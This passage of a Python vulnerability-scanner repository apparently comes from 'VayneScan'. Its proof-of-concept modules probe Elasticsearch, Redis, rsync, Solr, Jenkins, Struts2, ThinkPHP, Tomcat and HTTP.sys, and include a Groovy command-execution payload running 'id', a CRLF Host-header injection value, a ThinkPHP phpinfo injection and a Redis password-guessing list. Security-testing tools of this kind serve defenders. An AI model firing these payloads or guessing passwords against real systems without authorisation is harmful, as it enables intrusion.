    on the node — it is not a passive check. The verdict is the HTTP status
    of the search only; the body is not inspected, so a 200 by itself does
    not prove execution. Any exception prints "not vulnerable" (without an
    ``ENDC`` terminator, unlike the other two branches).
    """
    try:
        headers = {'Content-Type':'application/x-www-form-urlencoded'}
        req1 = requests.post(url+':9200/website/blog/', headers=headers, data="""{"name":"test"}""", timeout=5) # the index needs at least one document, so create one

        data = {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
        req = requests.post(url+':9200/_search?pretty', headers=headers, data=json.dumps(data), timeout=5)

        if req.status_code == 200:
            print(Vcolors.RED + "存在CVE-2015-1427 ElasticSearch远程命令执行" + Vcolors.ENDC)
        else:
            print(Vcolors.OKGREEN + "不存在CVE-2015-1427 ElasticSearch远程命令执行" + Vcolors.ENDC)
    except:
        print(Vcolors.OKGREEN + "不存在CVE-2015-1427 ElasticSearch远程命令执行")
69 |
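def esUnauto(url):
    """Check whether the Elasticsearch ``_cat`` API answers without authentication.

    Fetches ``<url>:9200/_cat`` and reports exposure when the endpoint
    listing (which contains ``/_cat/master``) comes back. The match is made
    on ``response.text``: the original tested a ``str`` against the raw
    ``bytes`` body, which raises ``TypeError`` under Python 3 and was then
    silently printed as "not vulnerable" by the bare ``except``. Connection
    errors and timeouts are still reported as "not vulnerable".
    """
    try:
        response = requests.get(url + ":9200/_cat", timeout=5)
        if "/_cat/master" in response.text:
            print(Vcolors.RED + "存在ElasticSearch未授权访问漏洞" + Vcolors.ENDC)
        else:
            print(Vcolors.OKGREEN + "不存在ElasticSearch未授权访问漏洞" + Vcolors.ENDC)
    except Exception:
        print(Vcolors.OKGREEN + "不存在ElasticSearch未授权访问漏洞" + Vcolors.ENDC)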
def esCheck(url):
    """Run every Elasticsearch probe in this module against *url*, in the order listed."""
    print('\n')
    print(Vcolors.OKBLUE + "正在对目标url进行ElasticSearch漏洞探测~~" + Vcolors.ENDC)
    for probe in (dirTravlesal, remoteCodeExe, remoteCodeExe1, esUnauto):
        probe(url)
--------------------------------------------------------------------------------
/poc/esunauto.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : esunauto.py
4 | @Time : 2019/07/15 11:00:45
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | import requests
12 | from lib import *
13 |
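def elasticsearch(ip):
    """Check whether the Elasticsearch ``_cat`` API on port 9200 answers without authentication.

    Builds ``<ip>:9200/_cat``, fetches it with a 5-second timeout and
    reports exposure when the endpoint listing (containing ``/_cat/master``)
    comes back. Two fixes over the original: the host and port are joined
    with ``:`` (the original produced ``host9200``; a caller that already
    passes a trailing ``:`` still works), and the match is done on
    ``response.text`` rather than the ``bytes`` body, which raised
    ``TypeError`` under Python 3 and was printed as "not vulnerable".
    Connection errors and timeouts are still reported as "not vulnerable".
    """
    print('\n')
    print(Vcolors.OKBLUE + "正在对目标url进行Elasticsearch未授权漏洞探测~~" + Vcolors.ENDC)
    try:
        port = 9200
        url = ip.rstrip(':') + ':' + str(port) + "/_cat"
        response = requests.get(url, timeout=5)
        if "/_cat/master" in response.text:
            print(Vcolors.RED + "存在Elasticsearch未授权漏洞" + Vcolors.ENDC)
        else:
            print(Vcolors.OKGREEN + "不存在Elasticsearch未授权漏洞" + Vcolors.ENDC)
    except Exception:
        print(Vcolors.OKGREEN + "不存在Elasticsearch未授权漏洞" + Vcolors.ENDC)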
--------------------------------------------------------------------------------
/poc/git.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : git.py
4 | @Time : 2019/07/06 00:43:23
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | import re
14 | from lib import *
15 |
16 |
def gitCheck(url2):
    """Probe the parent directories of *url2* for an exposed ``.git`` path.

    Every ancestor path of the URL gets ``/.git`` appended and is fetched
    with a plain GET (no timeout, so an unresponsive host blocks the scan).
    A 200 is printed as a leak with its address, anything else as clean.
    The URL as given is never probed itself — only its parents. Any
    exception (network error, malformed URL) is reported as a probable
    firewall block.
    """
    print('\n')
    print(Vcolors.OKBLUE + "正在对目标url进行.git漏洞探测~~" + Vcolors.ENDC)
    try:
        marker = "/.git"
        # Two slashes are discounted (presumably the ones in "scheme://");
        # each remaining one is a path segment that can be stripped.
        depth = url2.count('/') - 2
        candidates = []
        for _ in range(depth):
            url2 = url2[:url2.rfind("/")]
            candidates.append(url2 + marker)
        for url in candidates:
            r = requests.get(url)
            if r.status_code == 200:
                print(Vcolors.RED + "存在.git泄露漏洞,漏洞地址为:" + url + Vcolors.ENDC)
            else:
                print(Vcolors.OKGREEN + "不存在.git泄露漏洞" + Vcolors.ENDC)
    except:
        print(Vcolors.YELLOW + "疑似存在防火墙,链接已被拦截" + Vcolors.ENDC)
--------------------------------------------------------------------------------
/poc/hostinject.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : hostinject.py
4 | @Time : 2019/07/07 14:48:03
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | import requests
12 | import sys
13 | import re
14 | from lib import *
15 | # import ssl
16 |
17 | # ssl._create_default_https_context = ssl._create_unverified_context
18 |
def hostinject(url):
    """Check whether a caller-chosen ``Host`` header value is reflected by the target.

    Two header sets are prepared: a plain foreign ``Host`` and one carrying
    literal ``%0d%0a`` sequences. The second set is sent only when the first
    request raises, so the "header injection" branch is a fallback on
    failure rather than an independent second test. ``www.je2setest.com``
    anywhere in the response headers or body is printed as a Host-header
    attack, ``12345/foo`` as header injection. The outer bare
    ``except: pass`` swallows every failure — including the fallback
    request failing — so a network error produces no output at all.
    """
    try:
        print('\n')
        print(Vcolors.OKBLUE + "正在对目标url进行HOST主机头注入漏洞探测~~" + Vcolors.ENDC)
        headers={'Host' : 'www.je2setest.com'}
        headers1={'Host' : 'www.je2setest.com%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo'}
        try:
            req = requests.get(url, headers = headers, timeout = 5)
            resp = str(req.headers) + str(req.text)
        except:
            # Only reached when the plain-Host request failed.
            req1 = requests.get(url, headers = headers1, timeout = 5)
            resp =str(req1.headers) + str(req1.text)
        if 'www.je2setest.com' in resp:
            print(Vcolors.RED + "存在HOST头攻击漏洞~~" + Vcolors.ENDC)
        elif '12345/foo' in resp :
            print(Vcolors.RED + "存在HOST主机头注入漏洞~~" + Vcolors.ENDC)
        else:
            print(Vcolors.OKGREEN + "不存在HOST主机头注入漏洞~~" + Vcolors.ENDC)
    except:
        # Silent on any error: no verdict line is printed for this check.
        pass
--------------------------------------------------------------------------------
/poc/httpOptions.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : httpOptions.py
4 | @Time : 2019/07/06 19:45:26
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 |
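def options(url):
    """Report which risky HTTP methods the target advertises in its ``Allow`` header.

    Sends an OPTIONS request (5-second timeout) and inspects the ``Allow``
    response header for OPTIONS, PUT and TRACE. Each advertised method is
    printed on its own line; the original ``if/elif`` chain stopped at the
    first match, so PUT or TRACE were hidden whenever OPTIONS was also
    listed. A missing ``Allow`` header (``KeyError``), a timeout or any
    other failure is printed as "unknown".
    """
    try:
        print('\n')
        print(Vcolors.OKBLUE + "正在对目标url进行不安全的HTTP请求探测~~" + Vcolors.ENDC)
        r = requests.options(url, timeout=5)
        allowed = r.headers['allow']  # KeyError when the header is absent -> "unknown"
        findings = [
            ('OPTIONS', "目标URL开启了OPTIONS请求~~"),
            ('PUT', "目标URL开启了PUT请求~~"),
            ('TRACE', "目标URL开启了TRACE请求~~"),
        ]
        hit = False
        for method, message in findings:
            # Substring test, as in the original (no tokenising of the header).
            if method in allowed:
                hit = True
                print(Vcolors.RED + message + Vcolors.ENDC)
        if not hit:
            print(Vcolors.OKGREEN + "目标URL未开启不安全的HTTP请求~~" + Vcolors.ENDC)
    except Exception:
        print(Vcolors.OKGREEN + "目标URL的HTTP请求不明~~" + Vcolors.ENDC)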
31 |
--------------------------------------------------------------------------------
/poc/httpsys.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : http.sys.py
4 | @Time : 2019/07/06 23:22:19
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | from lib import *
12 | from fake_useragent import UserAgent
13 | import requests
14 | import re
15 | import sys
16 |
def httpsys(domain):
    """Probe for the HTTP.sys ``Range`` header flaw and print a verdict.

    A random User-Agent from ``fake_useragent`` is prepared for the probe
    and a 416 status is taken as the positive signal.
    NOTE(review): the first ``requests.get`` passes ``Timeout = 5``, which is
    not a ``requests`` keyword, so it raises ``TypeError`` before anything
    is sent and the function always ends in the ``except`` branch printing
    "not vulnerable". ``vuln_buffer`` is passed as ``params``, i.e. it is
    URL-encoded into the query string. Every failure, including this one,
    is reported as "not vulnerable" rather than "unknown".
    """
    try:
        print('\n')
        print(Vcolors.OKBLUE + "正在对目标url进行HTTP.sys远程命令执行漏洞探测~~" + Vcolors.ENDC)
        ua = UserAgent(verify_ssl=False)
        headers = {'User-Agent':ua.random}
        req = requests.get(str(domain),Timeout = 5)  # invalid keyword: raises TypeError
        vuln_buffer = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"
        req = requests.get(str(domain), headers = headers, params=vuln_buffer,timeout = 5)
        if req.status_code == 416 :
            print(Vcolors.RED + "存在HTTP.sys远程命令执行漏洞" + Vcolors.ENDC)
        else:
            print(Vcolors.OKGREEN + "不存在HTTP.sys远程命令执行漏洞" + Vcolors.ENDC)
    except :
        print(Vcolors.OKGREEN + "不存在HTTP.sys远程命令执行漏洞" + Vcolors.ENDC)
32 |
--------------------------------------------------------------------------------
/poc/jenkinsunauto.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : jenkinsunauto.py
4 | @Time : 2019/08/03 22:55:20
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import urllib3
15 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
16 |
def jenkins(url):
    """Check whether Jenkins' ``checkScriptCompile`` endpoint is reachable without login.

    The endpoint is fetched with a 5-second timeout and TLS verification
    disabled; a ``java.lang.NullPointerException`` string in the body is
    the signal used for an unauthenticated, reachable endpoint. Errors and
    timeouts are printed as "not vulnerable".
    """
    print('\n')
    print(Vcolors.OKBLUE + "正在对目标url进行Jenkins未授权漏洞探测~~" + Vcolors.ENDC)
    try:
        endpoint = ("/securityRealm/user/admin/descriptorByName/"
                    "org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile")
        response = requests.get(url + endpoint, timeout=5, verify=False)
        exposed = 'java.lang.NullPointerException' in response.text
        if exposed:
            colour, verdict = Vcolors.RED, "存在Jenkins未授权漏洞"
        else:
            colour, verdict = Vcolors.OKGREEN, "不存在Jenkins未授权漏洞"
        print(colour + verdict + Vcolors.ENDC)
    except:
        print(Vcolors.OKGREEN + "不存在Jenkins未授权漏洞" + Vcolors.ENDC)
--------------------------------------------------------------------------------
/poc/portscan.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : portscan.py
4 | @Time : 2019/07/07 01:14:29
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | from socket import *
12 | import threading
13 | from lib import *
14 |
threads = []  # Thread objects appended by portll(); joined there and never cleared between calls
16 |
17 | #端口扫描函数
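def portScanner(host, port):
    """Attempt a TCP connect to ``host:port`` (1-second timeout) and print the port if it accepts.

    ``socket.connect`` returns ``None`` on success and raises on failure, so
    the original ``if result`` test could never be true; the print is now
    simply placed after a successful connect. The socket is closed on every
    path via the context manager (the original leaked it when connect
    raised). All errors — refused, timeout, bad host, non-numeric port —
    are swallowed, so a closed port produces no output.
    """
    try:
        port = int(port)
        with socket(AF_INET, SOCK_STREAM) as s:
            s.settimeout(1)
            s.connect((host, port))
            print(Vcolors.RED + "发现开放端口,端口为:" + str(port) + Vcolors.ENDC)
    except Exception:
        pass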
31 |
32 |
def portScan(ip):
    """Print the scan banner and hand *ip* to portll() for the common-port sweep."""
    banner = (
        Vcolors.OKBLUE + "正在对目标常用端口探测~~" + Vcolors.ENDC,
        Vcolors.YELLOW + "检测中,请稍候~~" + Vcolors.ENDC,
    )
    print('\n')
    for line in banner:
        print(line)
    portll(ip)
38 |
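def portll(ip):
    """Scan a fixed list of commonly exposed service ports on *ip*, one thread per port.

    Each port is probed by portScanner() on its own thread; open ports are
    printed by that function. The list is deduplicated (``7778`` appeared
    twice, producing two probes and two lines). Only the threads started by
    this call are joined — the original joined the module-level ``threads``
    list, which grows across calls and was never cleared. Threads are still
    appended to that module-level list so existing callers that inspect it
    keep working.
    """
    setdefaulttimeout(1)
    # A fixed set of common service ports, not a 1-1024 sweep.
    portList = ["21","22","23","80","161","389","443","445","512","513","514","873","1025","111","1433","1521","5560","7778","2601","2604","3128","3306","3312","3311","3389","4440","5432","5900","5984","6082","6379","7001","7002","7778","8000","8001","8080","8089","8090","9090","8083","8649","8888","9200","9300","10000","11211","27017","27018","28017","50000","50070","50030","33891"]
    # dict.fromkeys drops duplicates while keeping the original order.
    started = []
    for p in dict.fromkeys(portList):
        t = threading.Thread(target=portScanner, args=(ip, int(p)))
        threads.append(t)
        started.append(t)
        t.start()

    for t in started:
        t.join()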
52 |
--------------------------------------------------------------------------------
/poc/redis.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : redis.py
4 | @Time : 2019/07/06 21:22:47
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import socket
13 | import sys
14 | from lib import *
15 |
# Candidate passwords that redisCheck() tries, in this order, when the server demands AUTH.
PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
17 |
def redisCheck(ip):
    """Check whether Redis on port 6379 answers ``info`` without authentication.

    Sends the ``info`` command and reads one reply: ``redis_version`` in
    the reply means no AUTH is required; ``Authentication`` means the server
    requires AUTH, and each entry of PASSWORD_DIC is then tried on a fresh
    connection. NOTE(review): under Python 3 that loop sends a ``str`` on
    the socket and tests the ``str`` ``'+OK'`` against ``bytes``; both
    raise ``TypeError``, so it falls into the bare ``except`` and prints the
    generic "not vulnerable" line. None of the sockets opened here is
    closed explicitly, and a refused connection or timeout prints the same
    "not vulnerable" line as a clean result.
    """
    try:
        print('\n')
        print(Vcolors.OKBLUE + "正在对目标url进行Redis未授权访问漏洞探测~~" + Vcolors.ENDC)
        socket.setdefaulttimeout(4)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        port = '6379'
        s.connect((ip, int(port)))
        exp = b'*1\r\n$4\r\ninfo\r\n'
        s.send(exp)
        result = s.recv(1024)
        if b"redis_version" in result:
            print(Vcolors.RED + "存在Redis未授权访问漏洞" + Vcolors.ENDC)
        elif b"Authentication" in result:
            for pass_ in PASSWORD_DIC:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("AUTH %s\r\n" %(pass_))  # str on a socket: TypeError under Python 3
                result = s.recv(1024)
                if '+OK' in result:  # str-in-bytes: TypeError under Python 3
                    print(Vcolors.YELLOW +"存在弱口令,密码:%s" % (pass_) + Vcolors.ENDC)
        else:
            print(Vcolors.OKGREEN + "不存在Redis未授权访问漏洞" + Vcolors.ENDC)

    except:
        print(Vcolors.OKGREEN + "不存在Redis未授权访问漏洞" + Vcolors.ENDC)
--------------------------------------------------------------------------------
/poc/rsyncunauth.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : rsyncunauth.py
4 | @Time : 2019/08/03 23:19:38
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | from lib import *
12 | import socket
13 |
timeout = 2  # seconds; rsyncheck() installs it with socket.setdefaulttimeout()
15 |
16 |
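def rsyncheck(ip):
    """Check whether the rsync daemon on port 873 lists its modules without authentication.

    Sends the protocol greeting (``@RSYNCD: 31.0``), and if the banner
    contains ``RSYNCD`` sends an empty line to request the module list; any
    non-empty reply is printed as exposure (an error reply would presumably
    count too — the content is not inspected). The banner comparison is
    done bytes-to-bytes: the original tested a ``str`` against ``bytes``,
    which raises ``TypeError`` under Python 3 and was printed as "not
    vulnerable". The socket is closed on every path. Connection errors and
    timeouts (module-level ``timeout``) are printed as "not vulnerable".
    """
    print('\n')
    print(Vcolors.OKBLUE + "正在对目标url进行Rsync未授权访问漏洞探测~~" + Vcolors.ENDC)
    try:
        payload = b"\x40\x52\x53\x59\x4e\x43\x44\x3a\x20\x33\x31\x2e\x30\x0a"  # "@RSYNCD: 31.0\n"
        socket.setdefaulttimeout(timeout)
        modulelist = b""
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.connect((ip, 873))
            sock.sendall(payload)
            initinfo = sock.recv(400)
            if b"RSYNCD" in initinfo:
                sock.sendall(b"\x0a")
                modulelist = sock.recv(200)
        if len(modulelist) > 0:
            print(Vcolors.RED + "存在Rsync未授权访问漏洞" + Vcolors.ENDC)
        else:
            print(Vcolors.OKGREEN + "不存在Rsync未授权访问漏洞" + Vcolors.ENDC)
    except Exception:
        print(Vcolors.OKGREEN + "不存在Rsync未授权访问漏洞" + Vcolors.ENDC)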
38 |
--------------------------------------------------------------------------------
/poc/solrunautho.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : solrunautho.py
4 | @Time : 2019/08/03 23:12:13
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 |
10 | Apache Solr 未授权访问PoC
11 | '''
12 | from lib import *
13 | import requests
14 | import urllib3
15 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
16 |
17 |
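def apachesolr(url):
    """Check whether the Solr admin dashboard at ``<url>/solr/`` loads without login.

    Reports exposure when the page returns 200 and its body contains both
    "Solr Admin" and "Dashboard". The body is compared as ``g.text``: the
    original tested ``str`` against the ``bytes`` body (``TypeError`` under
    Python 3, printed as "not vulnerable") and compared the status with
    ``is``, which only works because of CPython's small-int cache. TLS
    verification is disabled (``verify=False``); errors and timeouts are
    printed as "not vulnerable".
    """
    print('\n')
    print(Vcolors.OKBLUE + "正在对目标url进行Apache Solr 未授权访问漏洞探测~~" + Vcolors.ENDC)
    try:
        url = url + '/solr/'
        g = requests.get(url, timeout=5, verify=False)
        if g.status_code == 200 and 'Solr Admin' in g.text and 'Dashboard' in g.text:
            print(Vcolors.RED + "存在Apache Solr 未授权访问漏洞" + Vcolors.ENDC)
        else:
            print(Vcolors.OKGREEN + "不存在Apache Solr 未授权访问漏洞" + Vcolors.ENDC)
    except Exception:
        print(Vcolors.OKGREEN + "不存在Apache Solr 未授权访问漏洞" + Vcolors.ENDC)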
30 |
--------------------------------------------------------------------------------
/poc/struts2.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : struts2.py
4 | @Time : 2019/08/03 22:22:16
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | from lib import *
12 | from app2.s2_006 import s2_006
13 | from app2.s2_009 import s2_009
14 | from app2.s2_013 import s2_013
15 | from app2.s2_016 import s2_016
16 | from app2.s2_016_2 import s2_016_2
17 | from app2.s2_019 import s2_019
18 | from app2.s2_032 import s2_032
19 | from app2.s2_045 import s2_045
20 | from app2.s2_052 import s2_052
21 | from app2.s2_053 import s2_053
22 | from app2.s2_057 import s2_057
23 | from app2.s2_dev import s2_dev
24 |
def StrutsCheck(url):
    """Run every Struts2 probe imported from ``app2`` against *url*, in the order listed."""
    print('\n')
    print(Vcolors.OKBLUE + "正在对目标url进行Struts漏洞探测~~" + Vcolors.ENDC)
    probes = (
        s2_006, s2_009, s2_013, s2_016, s2_016_2, s2_019,
        s2_032, s2_045, s2_052, s2_053, s2_057, s2_dev,
    )
    for probe in probes:
        probe(url)
--------------------------------------------------------------------------------
/poc/svn.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : svn.py
4 | @Time : 2019/07/05 16:59:36
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | import requests
12 | import re
13 | from lib import *
14 |
15 |
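def svnCheck(url2):
    """Probe the parent directories of *url2* for an exposed ``.svn/entries`` file.

    Every ancestor path of the URL (the URL as given is not probed itself)
    gets the entries path appended and is fetched with a 3-second timeout;
    a 200 is printed as a leak with its address, anything else as clean.
    The stray ``print(r.status_code)`` debug line of the original is
    removed so only verdict lines are emitted. Any exception — timeout,
    refused connection, malformed URL — is printed as a probable firewall
    block.
    """
    try:
        print('\n')
        print(Vcolors.OKBLUE + "正在对目标url进行.SVN漏洞探测~~" + Vcolors.ENDC)
        default_url="/.svn/././././././././entries"
        # Two slashes are discounted (presumably the ones in "scheme://");
        # each remaining one is a path segment that can be stripped.
        depth = url2.count('/') - 2
        candidates = []
        for _ in range(depth):
            url2 = url2[:url2.rfind("/")]
            candidates.append(url2 + default_url)
        for url in candidates:
            r = requests.get(url, timeout=3)
            if r.status_code != 200:
                print(Vcolors.OKGREEN + "不存在.SVN泄露漏洞" + Vcolors.ENDC)
            else:
                print(Vcolors.RED + "存在.SVN泄露漏洞,漏洞地址为:" + url + Vcolors.ENDC)
    except Exception:
        print(Vcolors.YELLOW + "疑似存在防火墙,链接已被拦截" + Vcolors.ENDC)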
--------------------------------------------------------------------------------
/poc/thinkphprce.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : thinkphprce.py
4 | @Time : 2019/07/06 19:30:01
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 |
def thinkphp(target):
    """Probe a ThinkPHP route with a ``${@phpinfo()}`` parameter and print a verdict.

    The check is positive when the response is 200 and the literal text
    ``phpinfo()`` appears in the body. That text would also appear if the
    application merely echoes the request path, so a positive result is a
    hint rather than confirmation. Any exception (timeout, refused
    connection, bad URL) is printed as a probable firewall block.
    """
    try:
        print('\n')
        print(Vcolors.OKBLUE + "正在对目标url进行ThinkPHP命令执行漏洞探测~~" + Vcolors.ENDC)
        url = target + "/index.php/module/aciton/param1/${@phpinfo()}"
        r = requests.get(url, timeout=5)
        if r.status_code == 200 and "phpinfo()" in r.text:
            print(Vcolors.RED +"存在ThinkPHP命令执行漏洞" + Vcolors.ENDC)
        else:
            print(Vcolors.OKGREEN +"不存在ThinkPHP命令执行漏洞" + Vcolors.ENDC)
    except:
        print(Vcolors.YELLOW+"疑似存在防火墙,链接已被拦截"+ Vcolors.ENDC)
--------------------------------------------------------------------------------
/poc/tomcatexample.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : tomcatexample.py
4 | @Time : 2019/07/06 23:51:40
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | import requests
12 | from lib import *
13 |
14 |
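def tomcatCheck(url2):
    """Check whether Tomcat's bundled example web application is reachable under *url2*.

    Fetches ``/examples/servlets/servlet/CookieExample`` and ``/examples``
    with a 5-second timeout and prints any 200 as an exposed examples app.
    The first path had a stray trailing ``h`` in the original
    (``CookieExampleh``), so it could never match. Unlike the other
    modules, the original had no try/except, so a refused connection
    aborted the whole scan; it is now printed as a probable firewall block.
    """
    print('\n')
    print(Vcolors.OKBLUE + "正在对目标url进行Apache样例文件泄露探测~~" + Vcolors.ENDC)
    exp = ['/examples/servlets/servlet/CookieExample', '/examples']
    payload = [url2 + path for path in exp]
    try:
        for url in payload:
            r = requests.get(url, timeout=5)
            if r.status_code == 200:
                print(Vcolors.RED + "存在Apache样例文件泄露泄露漏洞,漏洞地址为:" + url + Vcolors.ENDC)
            else:
                print(Vcolors.OKGREEN + "不存在Apache样例文件泄露漏洞" + Vcolors.ENDC)
    except Exception:
        print(Vcolors.YELLOW + "疑似存在防火墙,链接已被拦截" + Vcolors.ENDC)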
--------------------------------------------------------------------------------
/poc/weblogic.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : main.py
4 | @Time : 2019/07/06 01:14:49
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | from app.platform import ManageProcessor
12 | from lib import *
13 |
def weblogicScan(ip, port):
    """Run the WebLogic plugin pipeline (``app.platform.ManageProcessor``) against ``ip:port``.

    The processor's return value is discarded; any output comes from the
    processor itself.
    """
    ManageProcessor().process(ip, port)
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | pyfiglet
2 | dnspython3
3 | bs4
4 | requests
5 | argparse
6 | urllib
7 | random
8 | logging
9 | socket
10 | traceback
11 | getopt
12 | Queue
13 | fake_useragent
14 | threading
--------------------------------------------------------------------------------
/script/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : __init__.py
4 | @Time : 2019/08/02 10:41:12
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | #模块导入界面
12 | from script.getip import ip2domain
13 | from script.getip import ipNew
--------------------------------------------------------------------------------
/script/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/script/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/script/__pycache__/getip.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/script/__pycache__/getip.cpython-37.pyc
--------------------------------------------------------------------------------
/script/getip.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : getip.py
4 | @Time : 2019/07/05 14:53:32
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | import dns.resolver
12 | from bs4 import BeautifulSoup
13 | import requests
14 | from lib import *
15 | import re
16 |
def ip2domain(ip):
    """Print the geolocation of *ip*, resolving it first when it is not an IPv4 literal.

    A dotted-quad IPv4 string is looked up directly via matchIP() and the
    "-h" hint is printed afterwards; anything else is treated as a hostname
    and handed to domainToip(). Both branches print the same banner first.
    """
    ipv4_literal = re.compile(r'^(((25[0-5]|2[0-4]\d|1\d{2})|([1-9]?\d))\.){3}((25[0-5]|2[0-4]\d|1\d{2})|([1-9]?\d))$')
    is_literal = ipv4_literal.search(ip)
    print('\n')
    print(Vcolors.OKBLUE + "正在对目标url进行归属地探测~~" + Vcolors.ENDC)
    if is_literal:
        matchIP(ip)
        print(Vcolors.OKGREEN + "具体命令请查看 '-h'~~~" + Vcolors.ENDC)
    else:
        domainToip(ip)
29 |
def ipNew(old_ip):
    """Return *old_ip* unchanged if it is an IPv4 literal, otherwise its first A record.

    Non-literal input is resolved with dnspython; the first rdtype-1 (A)
    record's address is returned. If the answer carries no A record the
    function falls off the end and returns ``None``; resolver errors
    propagate to the caller.
    """
    ipv4_literal = re.compile(r'^(((25[0-5]|2[0-4]\d|1\d{2})|([1-9]?\d))\.){3}((25[0-5]|2[0-4]\d|1\d{2})|([1-9]?\d))$')
    if ipv4_literal.search(old_ip):
        return old_ip
    answer = dns.resolver.query(old_ip, 'A')
    for rrset in answer.response.answer:
        for record in rrset.items:
            if record.rdtype == 1:
                return record.address
43 |
def domainToip(old_ip):
    """Resolve the hostname *old_ip* to its A records and geolocate each address via matchIP()."""
    answer = dns.resolver.query(old_ip, 'A')
    addresses = [
        record.address
        for rrset in answer.response.answer
        for record in rrset.items
        if record.rdtype == 1
    ]
    for address in addresses:
        matchIP(address)
51 |
def matchIP(new_ip):
    """Print the geographic location of *new_ip* as reported by ip.tool.chinaz.com.

    The scanned address is sent to that third-party web service (no
    timeout on the request) and the reply is scraped: every
    ``span.Whwtdhalf.w50-0`` whose text does not start with the label
    "IP的物理位置" is printed as the location. Parsing uses BeautifulSoup's
    ``lxml`` backend — NOTE(review): requirements.txt lists bs4 but not
    lxml; confirm it is installed, otherwise bs4 raises FeatureNotFound here.
    """
    lookup = "http://ip.tool.chinaz.com/" + str(new_ip)
    page = requests.get(lookup).text
    soup = BeautifulSoup(page, 'lxml')
